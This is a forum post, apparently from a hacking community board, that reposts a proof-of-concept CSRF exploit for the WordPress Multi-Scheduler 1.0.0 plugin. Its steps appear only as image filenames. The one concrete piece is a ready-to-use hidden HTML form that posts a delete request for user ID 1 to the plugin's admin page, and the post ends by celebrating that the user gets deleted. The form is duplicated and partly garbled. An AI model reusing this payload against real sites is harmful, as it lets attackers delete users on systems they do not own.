• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)

Laman1994

PvP Tactician
Divine
L Rep
0
0
0
Rep
0
L Vouches
0
0
0
Vouches
0
Posts
55
Likes
174
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
MID-SEASON-SALE.png

Vulnerability Details :

The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.


Full Proof of Concept (PoC)

Step -1

1-11.png


Step -2

2-10.png


Step -3

3-12.png


Step -4

<form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">

</form>12345<form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional"method="POST"><input type="hidden"name="pro&#95;delete&#95;id"value="1"/><input type="hidden"name="professional&#95;delete"value="Delete"/><input type="submit"value="Submit request"/></form>

4-13-1024x186.png


Step -5

5-9.png


Step -6

6-8-1024x282.png


BOOM 🙂 !! User will be deleted.

About the AuthorVirat Sharma Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
 

432,073

312,529

312,538

Top